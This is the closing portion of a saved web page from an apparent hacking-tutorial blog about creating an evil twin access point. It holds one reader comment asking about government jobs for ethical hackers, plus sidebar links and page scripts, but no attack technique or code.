<span itemprop="name">Dev</span> <span class="says">says</span> </p>
<p class="comment-meta"><time class="comment-time" datetime="2016-02-14T17:59:43+00:00" itemprop="datePublished"><a href="https://www.hackingloops.com/create-evil-twin-access-point/#comment-20283" class="comment-time-link" itemprop="url">February 14, 2016 at 5:59 pm</a></time></p> </header>
<div class="comment-content" itemprop="text">
<p>Sir, can I get a government job by ethical hacking course.</p>
</div>
<div class="comment-reply"><a rel="nofollow" class="comment-reply-link" href="https://www.hackingloops.com/create-evil-twin-access-point/?replytocom=20283#respond" onclick='return addComment.moveForm( "comment-20283", "20283", "respond", "4219" )' aria-label="Reply to Dev">Reply</a></div>
</article>
</li><!-- #comment-## -->
</ol></div> <div id="respond" class="comment-respond">
<h3 id="reply-title" class="comment-reply-title">Leave a Reply <small><a rel="nofollow" id="cancel-comment-reply-link" href="https://www.hackingloops.com/create-evil-twin-access-point/#respond" style="display:none;">Cancel reply</a></small></h3> <form action="https://www.hackingloops.com/wp-comments-post.php" method="post" id="commentform" class="comment-form" novalidate="">
<p class="comment-form-comment"><label for="comment">Comment</label> <textarea id="comment" name="comment" cols="45" rows="8" maxlength="65525" aria-required="true" required="required"></textarea></p><p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" size="30" maxlength="245" aria-required="true" required="required" type="text"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" size="30" maxlength="100" aria-describedby="email-notes" aria-required="true" required="required" type="email"></p>
<p class="comment-form-url"><label for="url">Website</label> <input id="url" name="url" size="30" maxlength="200" type="url"></p>
<p class="form-submit"><input name="submit" id="submit" class="submit" value="Post Comment" type="submit"> <input name="comment_post_ID" value="4219" id="comment_post_ID" type="hidden">
<input name="comment_parent" id="comment_parent" value="0" type="hidden">
</p><p style="display: none;"><input id="akismet_comment_nonce" name="akismet_comment_nonce" value="25d3853fee" type="hidden"></p><p style="display: none;"></p> <input id="ak_js" name="ak_js" value="1513611104000" type="hidden"></form>
</div><!-- #respond -->
</main><aside class="sidebar sidebar-primary widget-area" role="complementary" aria-label="Primary Sidebar" itemscope="" itemtype="http://schema.org/WPSideBar"><section id="text-8" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><div class="cta"><div class="shadow"><a href="https://howtohackin.leadpages.net/leadbox/14527a873f72a2%3A11a2b804c346dc/5730827476402176/"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Pentester.png" class="alignright size-medium wp-image-469"></a></div></div>
</div>
</div></section>
<section id="recent-posts-4" class="widget widget_recent_entries"><div class="widget-wrap"> <h4 class="widget-title widgettitle">Recent Posts</h4>
<ul>
<li>
<a href="https://www.hackingloops.com/equifax-data-breach/">Equifax Data Breach</a>
</li>
<li>
<a href="https://www.hackingloops.com/kick-victims-off-of-wireless-networks/">How Hackers Kick Victims Off of Wireless Networks</a>
</li>
<li>
<a href="https://www.hackingloops.com/command-cheat-sheet-for-linux/">The Ultimate Penetration Testing Command Cheat Sheet for Linux</a>
</li>
<li>
<a href="https://www.hackingloops.com/exploitation-terminology/">Introduction to Exploitation, Part 1: Introducing Concepts and Terminology</a>
</li>
<li>
<a href="https://www.hackingloops.com/how-to-build-an-arp-network-enumeration-tool-using-python/">How to Build an ARP Network Enumeration Tool Using Python</a>
</li>
</ul>
</div></section>
<section id="flex-featured-post-5" class="widget featured-content featuredpost"><div class="widget-wrap"><h4 class="widget-title widgettitle">Featured Posts</h4>
<div class="flex-featured-posts clearfix layout-full">
<article class="post-8647 post type-post status-publish format-standard has-post-thumbnail category-hacking-news pmpro-has-access entry"><a href="https://www.hackingloops.com/equifax-data-breach/" title="Equifax Data Breach" class="alignleft"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/Equifax-Data-Breach-75x75.png" class="entry-image attachment-post" alt="" itemprop="image" srcset="https://www.hackingloops.com/wp-content/uploads/2017/10/Equifax-Data-Breach-75x75.png 75w, https://www.hackingloops.com/wp-content/uploads/2017/10/Equifax-Data-Breach-150x150.png 150w" sizes="(max-width: 75px) 100vw, 75px" width="75" height="75"></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.hackingloops.com/equifax-data-breach/">Equifax Data Breach</a></h2></header></article><article class="post-8635 post type-post status-publish format-standard category-hack-tools category-hacking-tricks category-information-gathering category-network-penetration-testing category-open-source-penetration-testing-tools category-penetration-testing-tools category-recommended category-wireless-hacking category-wireless-pen-testing pmpro-has-access entry"><a href="https://www.hackingloops.com/kick-victims-off-of-wireless-networks/" title="How Hackers Kick Victims Off of Wireless Networks" class="alignleft"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/1-75x75.png" class="entry-image attachment-post" alt="" itemprop="image" srcset="https://www.hackingloops.com/wp-content/uploads/2017/07/1-75x75.png 75w, https://www.hackingloops.com/wp-content/uploads/2017/07/1-150x150.png 150w" sizes="(max-width: 75px) 100vw, 75px" width="75" height="75"></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.hackingloops.com/kick-victims-off-of-wireless-networks/">How Hackers Kick Victims Off of Wireless Networks</a></h2></header></article><article class="post-8545 post type-post status-publish format-standard has-post-thumbnail category-ethical-hacking category-hack-tools category-hacking-tricks category-information-gathering category-penetration-testing category-recommended pmpro-has-access entry"><a href="https://www.hackingloops.com/command-cheat-sheet-for-linux/" title="The Ultimate Penetration Testing Command Cheat Sheet for Linux" class="alignleft"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/cheetsheet-1-75x75.png" class="entry-image attachment-post" alt="" itemprop="image" srcset="https://www.hackingloops.com/wp-content/uploads/2017/03/cheetsheet-1-75x75.png 75w, https://www.hackingloops.com/wp-content/uploads/2017/03/cheetsheet-1-150x150.png 150w" sizes="(max-width: 75px) 100vw, 75px" width="75" height="75"></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.hackingloops.com/command-cheat-sheet-for-linux/">The Ultimate Penetration Testing Command Cheat Sheet for Linux</a></h2></header></article><article class="post-8626 post type-post status-publish format-standard has-post-thumbnail category-ethical-hacking category-malware category-recommended category-system-hacking tag-exploitation tag-introduction pmpro-has-access entry"><a href="https://www.hackingloops.com/exploitation-terminology/" title="Introduction to Exploitation, Part 1: Introducing Concepts and Terminology" class="alignleft"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/create-metasploit-exploit-few-minutes.jpg" class="entry-image attachment-post" alt="" itemprop="image" srcset="https://www.hackingloops.com/wp-content/uploads/2017/05/create-metasploit-exploit-few-minutes.1280x600-1-75x75.jpg 75w, https://www.hackingloops.com/wp-content/uploads/2017/05/create-metasploit-exploit-few-minutes.1280x600-1-150x150.jpg 150w" sizes="(max-width: 75px) 100vw, 75px" width="75" height="75"></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.hackingloops.com/exploitation-terminology/">Introduction to Exploitation, Part 1: Introducing Concepts and Terminology</a></h2></header></article><article class="post-8604 post type-post status-publish format-standard has-post-thumbnail category-recommended category-sniffing category-windows-hacking pmpro-has-access entry"><a href="https://www.hackingloops.com/how-to-build-an-arp-network-enumeration-tool-using-python/" title="How to Build an ARP Network Enumeration Tool Using Python" class="alignleft"><img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/ARPSniffingEnumeration-75x75.png" class="entry-image attachment-post" alt="" itemprop="image" srcset="https://www.hackingloops.com/wp-content/uploads/2017/04/ARPSniffingEnumeration-75x75.png 75w, https://www.hackingloops.com/wp-content/uploads/2017/04/ARPSniffingEnumeration-150x150.png 150w" sizes="(max-width: 75px) 100vw, 75px" width="75" height="75"></a><header class="entry-header"><h2 class="entry-title"><a href="https://www.hackingloops.com/how-to-build-an-arp-network-enumeration-tool-using-python/">How to Build an ARP Network Enumeration Tool Using Python</a></h2></header></article></div>
</div></section>
<section id="category-posts-4" class="widget cat-post-widget"><div class="widget-wrap"><h4 class="widget-title widgettitle">Ethical Hacking Practice Tests</h4>
<ul id="category-posts-4-internal" class="category-posts-internal">
<li class="cat-post-item"><a class="post-title cat-post-title" href="https://www.hackingloops.com/ethical-hacking-practice-test-7/" rel="bookmark">Ethical Hacking Practice Test 7</a> </li><li class="cat-post-item"><a class="post-title cat-post-title" href="https://www.hackingloops.com/ceh/" rel="bookmark">CEH Certification Overview</a> </li><li class="cat-post-item"><a class="post-title cat-post-title" href="https://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/" rel="bookmark">Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1</a> </li><li class="cat-post-item"><a class="post-title cat-post-title" href="https://www.hackingloops.com/ceh-practice-test-5-footprinting-fundamentals-level-0/" rel="bookmark">CEH Practice Test 5 – Footprinting Fundamentals Level 0</a> </li><li class="cat-post-item"><a class="post-title cat-post-title" href="https://www.hackingloops.com/ceh-practice-test-4-ethical-hacking-fundamentals-level-2/" rel="bookmark">CEH Practice Test 4 – Ethical Hacking Fundamentals Level 2</a> </li></ul>
</div></section>
</aside></div></div></div><div class="footer-widgets flex-footer-widgets-3"><div class="wrap"><div class="footer-widgets-1 widget-area"><section id="text-5" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><a href="https://www.hackingloops.com/contact-us/" class="button">Contact Us</a></div>
</div></section>
</div><div class="footer-widgets-2 widget-area"><section id="text-6" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget"><a href="https://www.hackingloops.com/privacy-policy/" class="button">Privacy Policy</a><br>
<br>
<a href="https://www.hackingloops.com/disclaimer/" class="button">Disclaimer</a></div>
</div></section>
</div><div class="footer-widgets-3 widget-area"><section id="text-4" class="widget widget_text"><div class="widget-wrap"> <div class="textwidget">500 Westover Dr #8208 Sanford NC 27330</div>
</div></section>
</div></div></div><footer class="site-footer" itemscope="" itemtype="http://schema.org/WPFooter"><div class="wrap"><div class="footer-copyright footer-left">Copyright © 2017 HackingLoops All Rights Reserved </div></div></footer></div><div class="go_top hide" style="display: block;"><span class="dashicons dashicons-arrow-up-alt2"></span></div> <!-- Memberships powered by Paid Memberships Pro v1.8.12.1.
-->
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/form.js"></script>
<script type="text/javascript">
/* <![CDATA[ */
var frontend_ajax_object = {"ajax_url":"https:\/\/www.hackingloops.com\/wp-admin\/admin-ajax.php","ajax_nonce":"62063e5b72"};
/* ]]> */
</script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/frontend.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/devicepx-jetpack.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/comment-reply.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/wp-embed.js"></script>
<script type="text/javascript" src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/e-201751.js" async="" defer="defer"></script>
<script type="text/javascript">
_stq = window._stq || [];
_stq.push([ 'view', {v:'ext',j:'1:4.5',blog:'123341614',post:'4219',tz:'0',srv:'www.hackingloops.com'} ]);
_stq.push([ 'clickTrackerInit', '123341614', '4219' ]);
</script>
<img src="How%20to%20Create%20Evil%20Twin%20Access%20Point_files/g.gif" alt=":)" id="wpstats" width="6" height="5"></body></html>